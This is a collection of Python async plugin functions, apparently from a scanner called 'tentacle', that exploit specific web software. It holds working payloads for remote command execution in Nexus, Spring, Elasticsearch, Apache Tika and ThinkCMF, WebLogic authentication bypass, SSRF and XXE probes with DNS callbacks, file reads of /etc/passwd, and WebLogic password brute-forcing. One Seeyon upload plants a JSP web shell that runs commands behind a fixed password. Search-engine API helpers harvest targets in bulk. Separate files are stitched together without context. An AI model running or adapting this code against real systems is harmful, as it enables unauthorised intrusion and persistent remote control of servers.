async def prove(self): # socks proxy proxy = 'socks5://{}:{}'.format(self.target_host, str(self.target_port)) connector = SocksConnector.from_url(proxy) url = self.ceye_dns_api(t='url') async with ClientSession(connector=connector) as session: async with session.options(url=url) as res1: if res1: text1 = await res1.text() if 'HTTP Record Insert Success' in text1: self.flag = 1 self.res.append({"info": proxy, "key": "proxy unauth"}) return # http proxy proxy = 'http://{}:{}'.format(self.target_host, str(self.target_port)) async with ClientSession() as session: async with session.get(url=url, proxy=proxy) as res2: if res2: text2 = await res2.text() if 'HTTP Record Insert Success' in text2: self.flag = 1 self.res.append({"info": proxy, "key": "proxy unauth"}) return
async def prove(self): # socks proxy proxy = 'socks5://{}:{}'.format(self.target_host, str(self.target_port)) connector = SocksConnector.from_url(proxy) url = 'http://example.com/' async with ClientSession(connector=connector) as session: async with session.get(url=url) as res1: if res1: text1 = await res1.text() if 'More information...' in text1: self.flag = 1 self.res.append({"info": proxy, "key": "proxy unauth"}) return # http proxy proxy = 'http://{}:{}'.format(self.target_host, str(self.target_port)) async with ClientSession() as session: async with session.get(url=url, proxy=proxy) as res2: if res2: text2 = await res2.text() if 'More information...' in text2: self.flag = 1 self.res.append({"info": proxy, "key": "proxy unauth"}) return
async def _zoomeye_api(search, page, z_type): """ app:"Drupal" country:"JP" curl -X POST https://api.zoomeye.org/user/login -d ' { "username": "******", "password": "******" }' """ headers = {} url_login = '******' try: data = { 'username': conf['zoomeye_api']['username'], 'password': conf['zoomeye_api']['password'] } async with ClientSession() as session: async with session.post(url=url_login, json=data, headers=headers) as response: if response: res = await response.text() headers["Authorization"] = "JWT " + json.loads(res)['access_token'] except KeyError: sys.exit(logger.error("Load tentacle config error: zoomeye_api, please check the config in tentacle.conf.")) except AttributeError as e : sys.exit(logger.error("Zoomeye api error: the response is none.")) except Exception as e: sys.exit(logger.error("Zoomeye api error: %s" %type(e).__name__)) if z_type.lower() == 'web': url_api = "https://api.zoomeye.org/web/search" elif z_type.lower() == 'host': url_api = "https://api.zoomeye.org/host/search" else: url_api = None logger.error("Error zoomeye api with type {0}.".format(z_type)) yield None logger.sysinfo("Using zoomeye api with type {0}.".format(z_type)) async with ClientSession() as session: for n in range(1, page+1): logger.debug("Find zoomeye url of %d page..." % int(n)) try: data = {'query': search, 'page': str(n)} async with session.get(url=url_api, params=data, headers=headers) as response: if response: res = await response.text() if int(response.status) == 422: sys.exit(logger.error("Error zoomeye api token.")) if z_type.lower() == 'web': result = re.compile('"url": "(.*?)"').findall(res) elif z_type.lower() == 'host': result = [str(item['ip']) + ':' + str(item['portinfo']['port']) for item in json.loads(res)['matches']] logger.debug("Zoomeye Found: %s" % result) yield result except Exception: yield []
async def prove(self): await self.get_url() if self.base_url: path_list = list( set([ self.url_normpath(self.base_url, '/'), self.url_normpath(self.url, './'), ])) async with ClientSession() as session: for path in path_list: url = path + "index.php?g=Api&m=Plugin&a=fetch" _data = "templateFile=/../../../public/index&prefix=''&content=<php>file_put_contents('bytestforme2.php','<?php phpinfo();')</php>" async with session.post(url=url, data=_data) as res: if res != None and res.status == 200: async with session.get(url=path + "/bytestforme2.php") as res: if res != None and res.status == 200: text = await res.text() if 'php.ini' in text: self.flag = 1 self.req.append({"flag": url}) self.res.append({ "info": url, "key": "thinkcmf 2.2.3 template inject" })
async def prove(self): await self.get_url() if self.base_url: path_list = list( set([ self.url_normpath(self.base_url, '/'), self.url_normpath(self.base_url, '/nexus3/'), ])) async with ClientSession() as session: for path in path_list: url = path + 'service/extdirect' headers = {"Content-Type": "application/json"} dns = self.ceye_dns_api(k='cve20197328', t='dns') cmd = 'ping ' + dns data = '{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":25,"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"1.class.forName(\'java.lang.Runtime\').getRuntime().exec(' + cmd + ').waitFor()".format(self.BANNER, self.DOMAIN)},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":4}' async with session.post(url=url, json=data, headers=headers) as res: await asyncio.sleep(1) if await self.ceye_verify_api(dns, t='dns'): self.flag = 1 self.res.append({ "info": url, "key": "CVE-2019-7238" }) return
async def prove(self): await self.get_url() if self.base_url: headers = {'Content-Type': 'application/x-www-form-urlencoded'} url = self.base_url + 'console/css/%252e%252e%252fconsole.portal' async with ClientSession() as session: async with session.get(url=url, headers=headers, allow_redirects=False) as res: if res != None and res.status == 302: cookies = res.cookies async with session.get(url=url, cookies=cookies, headers=headers, allow_redirects=False) as res: if res != None and res.status != 404: text = await res.text() if ('base_domain' in text and 'SecurityRealmRealmTablePage' in text ) or ('Home Page' in text or 'WebLogic Server Console' in text and 'console.portal' in text): self.flag = 1 self.res.append({ "info": url, "key": "weblogic CVE-2020-14750" }) return
async def prove(self): await self.get_url() if self.base_url: path_list = list( set([ self.url_normpath(self.base_url, '/'), self.url_normpath(self.url, './'), self.url_normpath(self.url, '') ])) async with ClientSession() as session: for path in path_list: datas = [ 'username[(#root.getClass().forName("java.lang.ProcessBuilder").getConstructor(\'foo\'.split(' ').getClass()).newInstance(\'ecxxho%20springxx_test\'.split(\'xx\'))).start()]=test', 'username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\'echo%20spring_test\')")]=test', 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("echo%20spring_test")]=test' ] for _data in datas: async with session.get( url=path, data=_data, ) as res: if res: text = await res.text() if "spring_test" in text: self.flag = 1 self.res.append({ "info": path, "key": "Spring RCE CVE-2018-1273" }) break
async def prove(self): await self.get_url() if self.base_url: path_list = list( set([ self.url_normpath(self.base_url, '/'), self.url_normpath(self.base_url, '../wordpress/'), self.url_normpath(self.url, './'), ])) async with ClientSession() as session: for path in path_list: dns = self.ceye_dns_api(k='xmlrpc', t='dns') url = path + 'xmlrpc.php' headers = {"Content-Type": "text/xml"} data = '''<?xml version="1.0" encoding="iso-8859-1"?> <methodCall> <methodName>pingback.ping</methodName> <params> <param><value><string>http://{dns}/</string></value></param> <param><value><string>{path}?p=1</string></value></param> </params> </methodCall>'''.format(dns=dns, path=path) async with session.post(url=url, data=data, headers=headers) as res: if res != None: await asyncio.sleep(1) if await self.ceye_verify_api(dns, 'dns'): self.flag = 1 self.req.append({"url": url}) self.res.append({ "info": url, "key": "wordpress xmlrpc ssrf" }) break
async def prove(self): await self.get_url() if self.base_url: table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6' test_file = 'test' + str(random.randint(100000, 999999)) + '.txt' base64_file = str( base64encode( '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format( test_file), table)) url = self.base_url + 'seeyon/htmlofficeservlet' async with ClientSession() as session: async with session.get(url=url) as response: if response != None: text = await response.text() if 'DBSTEP V3.0' in text: data = '''DBSTEP V3.0 355 0 22 DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME={}\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66 \r\nthis is a test for me.f82abdd62cce9d2841a6efd5663e7bee'''.format( base64_file) async with session.post(url=url, data=data) as response2: # print(self.base_url + 'seeyon/' + test_file) await asyncio.sleep(1) url1 = self.base_url + 'seeyon/' + test_file async with session.get(url=url1) as response2: if response2 != None: text2 = await response2.text() if 'this is a test for me' in text2: self.flag = 1 self.res.append({ "info": url1, "key": 'seeyon getshell' })
async def _google_api(search, page): ''' https://console.developers.google.com https://developers.google.com/custom-search/v1/cse/list poc-t search_enging 011385053819762433240:ljmmw2mhhau https://cse.google.com.hk/cse?cx=011385053819762433240:ljmmw2mhhau&gws_rd=cr ''' try: developer_key = conf['google_api']['developer_key'] search_enging= conf['google_api']['search_enging'] except KeyError: sys.exit(logger.error("Load tentacle config error: google_api, please check the config in tentacle.conf.")) async with ClientSession() as session: for p in range(0,page): base_url = 'https://www.googleapis.com/customsearch/v1?cx={0}&key={1}&num=10&start={2}&q={3}'.format(search_enging,developer_key,str(p * 10 +1),search) async with session.get(url=base_url) as response: if response: res = await response.text() if int(response.status) == 200: res_json = json.loads(res) try: for item in res_json.get('items'): yield item.get('link') except: break else: logger.error("Error google api access, and api rate limit 100/day, maybe you should pay money and enjoy service.") break
async def prove(self): await self.get_url() if self.base_url: xmldata = ''' <?xml version="1.0" encoding="UTF-8"?> <root> dGVzdCBieSBtZQ== </root> ''' path_list = list( set([ self.url_normpath(self.base_url, '/'), self.url_normpath(self.base_url, '../ucms/'), self.url_normpath(self.url, 'ucms/'), self.url_normpath(self.url, '../ucms/'), ])) async with ClientSession() as session: for path in path_list: myurl = path + 'cms/client/uploadpic_html.jsp?toname=justfortest.jsp&diskno=xxxx' async with session.post(url=myurl, data=xmldata) as res: if res != None and res.status is 200: myurl = path + 'cms-data/temp_dir/xxxx/temp.files/justfortest.jsp' async with session.post(url=myurl, data=xmldata) as res: if res != None: text = await res.text() if 'test by me' in text: self.flag = 1 self.req.append({"page": myurl}) self.res.append({ "info": myurl, "key": "ucms upload" })
async def prove(self): await self.get_url() if self.base_url: path_list = list(set([ self.url_normpath(self.base_url, '/'), self.url_normpath(self.url, './'), ])) async with ClientSession() as session: for path in path_list: payload = ( ("SAVE_CONFIG", "1"), ("PDF_Directory", "/var/www/html/flex2.3.6/flexpaper/pdf"), ("SWF_Directory", "config/"), ("LICENSEKEY", ""), ("splitmode", "1"), ("RenderingOrder_PRIM", "flash"), ("RenderingOrder_SEC", "html")) shellcode = "%65%63%68%6f%20%50%44%39%77%61%48%41%67%63%47%68%77%61%57%35%6d%62%79%67%70%4f%7a%38%2b%20%7c%62%61%73%65%36%34%20%2d%64%20%3e%24%28%70%77%64%29%2f%74%65%73%74%66%6f%72%6d%65%2e%70%68%70" url1 = path + "flexpaper/php/change_config.php" url2 = path + "flexpaper/php/setup.php?step=2&PDF2SWF_PATH=" + shellcode url3 = path + 'flexpaper/php/testforme.php' async with session.post(url=url1, data=payload) as res1: if res1 != None and res1.status == 200: async with session.get(url=url2) as res2: if res2 != None and res2.status == 200: async with session.get(url=url3) as res3: if res3 != None: text3 = await res3.text() if "php.ini" in text3: self.flag = 1 self.req.append({"url": url3}) self.res.append({"info": url3, "key": "flexpaper_236_getshell"}) return
async def prove(self): await self.get_url() if self.base_url: path_list = list( set([ self.url_normpath(self.base_url, '/'), self.url_normpath(self.url, './'), ])) async with ClientSession() as session: for path in path_list: dns = self.ceye_dns_api(t='url') url = path + "plugin.php?id=wechat:wechat&ac=wxregister&username=vov&avatar=%s&wxopenid=%s" % ( dns, ''.join( [random.choice(ascii_lowercase) for _ in range(8)])) async with session.get(url=url) as res: if res != None: await asyncio.sleep(1) if await self.ceye_verify_api(dns, 'http'): self.flag = 1 self.req.append({"flag": url}) self.res.append({ "info": url, "key": "discuz x3.4 ssrf" })
async def prove(self): await self.get_url() if self.base_url: path_list = list( set([ self.url_normpath(self.base_url, '/'), self.url_normpath(self.url, './'), self.url_normpath(self.url, '../'), ])) async with ClientSession() as session: for path in path_list: url = path + "kindeditor/php/upload_json.php?dir=file" data = FormData() data.add_field('imgFile', "this is a test for you. ", filename='mytestforyou.html', content_type='text/plain') async with session.post(url=url, data=data) as res: if res != None: text = await res.text() try: res = json.loads(text) if 'url' in res.keys( ) and 'kindeditor' in res['url']: self.flag = 1 self.req.append({"url": url}) self.res.append({"info": url, "key": url}) except: pass
async def prove(self): ''' 其中JAVA等价于: String s1 = new java.util.Scanner(Runtime.getRuntime().exec("ipconfig").getInputStream()).useDelimiter("\\A").next(); //A means "start of string", and \z means "end of string". String s2 = new java.util.Scanner(Runtime.getRuntime().exec("ipconfig").getInputStream()).next(); System.out.println(s1) ''' await self.get_url() if self.base_url: ran = str(random.randint(100000, 999999)) headers = { 'Content-Type': 'application/x-www-form-urlencoded' } _data = ''' { "size":1, "script_fields": { "test#": { "script": "java.lang.Math.class.forName(\\"java.io.BufferedReader\\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"echo '''+ ran + '''\\").getInputStream())).readLines()", "lang": "groovy" } } } ''' async with ClientSession() as session: url = self.base_url + '_search?pretty' async with session.post(url=url, headers=headers, data=_data) as res: if res != None: text = await res.text() if ran in text: self.flag = 1 self.req.append({"url": url}) self.res.append({"info": url, "key": "CVE-2015-1427"})
async def prove(self): await self.get_url() if self.base_url: path = self.base_url async with ClientSession() as session: new_path = await self.get_new_work_path(session, path) flag = await self.set_new_upload_path(session, path, new_path) if flag: form = aiohttp.FormData() form.add_field('ks_edit_mode', 'false') form.add_field('ks_password_front', 'mytest') form.add_field('ks_password_changed', 'true') form.add_field('ks_filename', prove_content, filename="myTestFile.txt",content_type='application/octet-stream') async with session.post(url=path + "ws_utc/resources/setting/keystore", data=form) as res: if res: text = await res.text() match = re.findall("<id>(.*?)</id>", text) if match: tid = match[-1] shell_path = self.base_url + "ws_utc/css/config/keystore/" + str(tid) + "_myTestFile.txt" async with session.get(url=shell_path, headers=headers) as res: if res: text = await res.text() if upload_content in text: self.flag = 1 self.res.append({"info": shell_path, "key": "CVE-2018-2894"})
async def prove(self): await self.get_url() if self.base_url: dns = self.ceye_dns_api(k='fjinfo', t='dns') # logger.sysinfo(dns + ' ------- '+ self.base_url) async with ClientSession() as session: pocs = [ { "test": { "@type": "java.net.Inet4Address", "val": dns } }, { "test": { "@type": "java.net.Inet6Address", "val": dns } }, ] for poc in pocs: for url in self.url_normpath(self.url, './'): try: async with session.post(url=url, json=poc) as res: pass except: pass if await self.ceye_verify_api(dns, 'dns'): self.flag = 1 self.res.append({"info": url, "key": dns})
async def _fofa_api(search, page, flag = True): ''' https://fofa.so/api#auth ''' url_login = '******' try: email = conf['fofa_api']['email'] key = conf['fofa_api']['token'] except KeyError: sys.exit(logger.error("Load tentacle config error: zfofa_api, please check the config in tentacle.conf.")) if flag: logger.sysinfo("Using fofa api...") search = str(base64encode(search)) async with ClientSession() as session: for p in range(1,page+1): logger.debug("Find fofa url of %d page..." % int(p)) async with session.post(url=url_login + '?email={0}&key={1}&page={2}&qbase64={3}'.format(email, key,p, search)) as response: if response !=None: if int(response.status) == 401: sys.exit(logger.error("Error fofa api access, maybe you should pay fofa coin and enjoy service.")) else: res = await response.text() if res !=None: res_json = json.loads(res) if res_json["error"] is None: if len(res_json.get('results')) == 0: break for item in res_json.get('results'): logger.debug("Fofa Found: %s" % item[0]) yield item[0]
async def upload(self): await self.get_url() if self.base_url: table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6' test_file = 'test' + str(random.randint(100000, 999999)) + '.jsp' base64_file = str( base64encode( '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format( test_file), table)) url = self.base_url + 'seeyon/htmlofficeservlet' async with ClientSession() as session: async with session.get(url=url) as response: if response != None: text = await response.text() if 'DBSTEP V3.0' in text: data = '''DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME=''' + base64_file + '''\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66\r\n<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("test12345".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>c0a4500844f330626a5f11e1563b03f2''' async with session.post(url=url, data=data) as response: await asyncio.sleep(1) url1 = self.base_url + 'seeyon/' + test_file async with session.get(url=url1) as response1: if response1 != None: text1 = await response1.text() if ':-)' in text1: self.flag = 1 self.res.append({ "info": url1 + '?pwd=test12345&cmd=whoami', "key": 'seeyon getshell' })
async def prove(self): await self.get_url() if self.base_url: headers = {'Content-Type': 'application/x-www-form-urlencoded'} usernamedic = self.read_file( self.parameter['U']) if 'U' in self.parameter.keys( ) else self.read_file( os.path.join(paths.DICT_PATH, 'weblogic_usernames.txt')) passworddic = self.read_file( self.parameter['P']) if 'P' in self.parameter.keys( ) else self.read_file( os.path.join(paths.DICT_PATH, 'weblogic_passwords.txt')) url = self.base_url + 'console/j_security_check' async with ClientSession() as session: async for (username, password) in self.generate_dict( usernamedic, passworddic): # 登陆失败错误过多会锁账户,不建议尝试爆破过多,5次以下差不多 data = 'j_username={}&j_password={}&j_character_encoding=UTF-8'.format( username, password) async with session.post(url=url, data=data, headers=headers, allow_redirects=False) as res: if res != None and res.status == 302: location = res.headers.get('Location', '') if '/console' in location and '/login/LoginForm.jsp' not in location: # if ('Home Page' in text or 'WebLogic Server Console' in text and 'console.portal' in text): self.flag = 1 self.res.append({ "info": username + "/" + password, "key": "weblogic burst" }) return
async def prove(self): await self.get_url() if self.base_url: headers = {"Content-Type": "application/x-www-form-urlencoded"} async with ClientSession() as session: for path in self.url_normpath(self.url, [ './phpMyAdmin/', './pma/', '/phpmyadmin/', './', ]): url = path + 'scripts/setup.php' datas = [ 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}', 'action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:18:"C:\\Windows\\win.ini";}' ] for data in datas: async with session.post(url=url, headers=headers, data=data, allow_redirects=False) as res: if res: text = await res.text() if 'root:' in text or '[extensions]' in text: self.flag = 1 self.res.append({ "info": url, "key": "phpmyadmin_setup_deserialization" }) return
async def prove(self): await self.get_url() if self.base_url: path_list = list( set([ self.url_normpath(self.base_url, '/'), self.url_normpath(self.url, './'), self.url_normpath(self.url, '') ])) async with ClientSession() as session: for path in path_list: headers = { "Content-Type": "application/json-patch+json", } datas = [ '[{"op":"add","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{119, 104, 111, 97, 109, 105}))/foo"}]', '[{"op":"add","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{119, 104, 111, 97, 109, 105}))[foo]"}]' ] for _data in datas: async with session.patch(url=path, data=_data, headers=headers) as res: if res: text = await res.text() if "SpelEvaluation" in text: self.flag = 1 self.res.append({ "info": path, "key": "Spring RCE CVE-2017-8046" }) break
async def prove(self): await self.get_url() if self.base_url: path_list = list(set([ self.url_normpath(self.base_url, '/'), self.url_normpath(self.base_url, '../PbootCMS/'), self.url_normpath(self.url, 'PbootCMS/'), self.url_normpath(self.url, '../PbootCMS/'), ])) async with ClientSession() as session: for path in path_list: for poc in [ "index.php/index/index?keyword={pboot:if(eval($_REQUEST[1]));//)})}}{/pboot:if}&1=phpinfo();" "index.php/index/index?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo", "index.php/Content/2?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo", "index.php/List/2?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo", "index.php/About/2?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo", "index.php/Search/index?keyword={pboot:if(1)$a=$_GET[title];$a();//)})}}{/pboot:if}&title=phpinfo" ]: url = path + poc async with session.get(url=url) as res: if res !=None: text = await res.text() if "php.ini" in text: self.flag = 1 self.req.append({"url": url}) self.res.append({"info": url, "key": "pbootcms v1.3.2 rec"}) break
async def prove(self): await self.get_url() if self.base_url != None: path_list = list( set([ self.url_normpath(self.base_url, '/'), self.url_normpath(self.url, './'), ])) async with ClientSession() as session: for path in path_list: async with session.options(url=path + "testbyme") as response: if response != None and 'Allow' in response.headers and 'PUT' in response.headers[ 'Allow']: for _url in [ str(int(time.time())) + '.jsp/', str(int(time.time())) + '.jsp::$DATA', str(int(time.time())) + '.jsp%20' ]: url = path + _url async with session.put( url=url, data='test') as response: if response != None: if response.status == 201 or response.status == 204: self.flag = 1 self.req.append({"method": "put"}) self.res.append({ "info": url, "key": "PUT" })
async def prove(self): await self.get_url() if self.base_url: async with ClientSession() as session: dns = self.ceye_dns_api(t='url') for path in [self.base_url, self.base_url + "solr/"]: url = path + 'admin/cores?wt=json' async with session.get(url=url, allow_redirects=False) as res: if res and res.status == 200: text = await res.text() if 'responseHeader' in text: matchObj = re.search(r'"name":"(?P<core>.*?)"', text) if matchObj: name = matchObj.group(1) url1 = path + name + '/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22{dns}%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser'.format( dns=dns) async with session.get(url=url1) as res1: if res1: if await self.ceye_verify_api( dns, 'http'): self.flag = 1 self.res.append({ "info": url, "key": "CVE-2017-12629" }) return
async def prove(self): await self.get_url() if self.url : async with ClientSession() as session: webkeydic = self.read_file(self.parameter['keyword'],'rb') if 'keyword' in self.parameter.keys() else self.read_file('dict/web_content_key.txt', 'rb') async with session.get(url=self.url) as response: if response is not None : res = await response.read() try: res = str(res, 'utf-8') except UnicodeDecodeError: res = str(res, 'gbk') except: res = "[Error Code]" m = re.search('<title>(.*)<\/title>', res.lower()) if m != None and m.group(1): title = m.group(1) else: title = '[None Title]' key = '' for searchkey in webkeydic: searchkey = str(searchkey, 'utf-8').replace("\r", "").replace("\n", "") try: if searchkey in res: key += searchkey + ',' self.flag = 1 except Exception as e: print(e) pass if self.flag == 1: self.res.append({"info": title, "key": key[:-1]})
async def exec(self): await self.get_url() if self.base_url: headers = { "X-Tika-OCRTesseractPath": "\"cscript\"", "X-Tika-OCRLanguage": "//E:Jscript", "Expect": "100-continue", "Content-type": "image/jp2", "Connection": "close" } url = self.base_url + "meta" jscript = '''var oShell = WScript.CreateObject("WScript.Shell"); var oExec = oShell.Exec('cmd /c {}'); '''.format(self.parameter['cmd']) async with ClientSession() as session: async with session.put(url=url, headers=headers, data=jscript) as res: if res != None: text = await res.text() if res != None and "X-Parsed-By" in text and "tika.parse" in text: self.flag = 1 self.req.append({"flag": url}) self.res.append({ "info": text, "key": "Apache Tika-server RCE" })
async def prove(self): await self.get_url() if self.base_url: PAYLOADS = ( re.compile(r'<title>Index of /', re.I), re.compile(r'<a href="?C=N;O=D">Name</a>', re.I), re.compile(r'<A HREF="?M=A">Last modified</A>', re.I), re.compile(r'Last modified</a>', re.I), re.compile(r'Parent Directory</a>', re.I), re.compile(r'<TITLE>Folder Listing.', re.I), re.compile(r'<table summary="Directory Listing', re.I), re.compile(r'">[To Parent Directory]</a><br><br>', re.I), re.compile(r'<dir> <A HREF="/', re.I), re.compile(r'''<pre><A HREF="/">\[''', re.I), ) async with ClientSession() as session: path_list = list(set([ self.url_normpath(self.base_url, '/'), self.url_normpath(self.url, './'), self.url_normpath(self.url, '../'), ])) for path in path_list: url = path async with session.get(url=url) as response: if response and response.status==200: text = str(await response.read()) for payload in PAYLOADS: r = payload.findall(text) if r: self.flag = 1 self.res.append({"info": url, "key": "directory_list"}) return
async def prove(self): await self.get_url() if self.base_url: async with ClientSession() as session: for path in self.url_normpath(self.url, './'): pocs = [ "wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt", "wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt" ] for poc in pocs: url = path + poc async with session.get(url=url) as res: if res != None and res.status == 200: text = await res.text() if 'id' in text and 'filepath' in text and 'name' in text: file_id = json.loads(text).get('id', '') if file_id: url2 = path + 'file/fileNoLogin/' + str( file_id) async with session.get( url=url2) as res2: if res2 != None and res2.status == 200: text2 = await res2.text() if '[extensions]' in text2 or 'root:x:' in text2: self.flag = 1 self.req.append( {"url": url2}) self.res.append({ "info": url, "key": "weaver e-bridge lfl" }) return
async def prove(self): await self.get_url() if self.base_url != None: async with ClientSession() as session: for url in [self.base_url, self.base_url + "docs/", self.base_url + "manager/", self.base_url + "examples/", self.base_url + "host-manager/"]: async with session.get(url=url) as res: if res: text = await res.text() if res.status == 200 and 'Apache Tomcat Examples' in text: self.flag = 1 self.req.append({"page": 'tomcat page'}) self.res.append({"info": url, "key": "tomcat page"}) elif res.status == 401 and '401 Unauthorized' in text and 'tomcat' in text: self.flag = 1 self.req.append({"page": 'tomcat page'}) self.res.append({"info": url, "key": "tomcat page"}) elif res.status == 403 and '403 Access Denied' in text and 'tomcat-users' in text: self.flag = 1 self.req.append({"page": 'tomcat page'}) self.res.append({"info": url, "key": "tomcat page"}) elif res.status == 200 and 'Documentation' in text and 'Apache Software Foundation' in text and 'tomcat' in text: self.flag = 1 self.req.append({"page": 'tomcat page'}) self.res.append({"info": url, "key": "tomcat page"})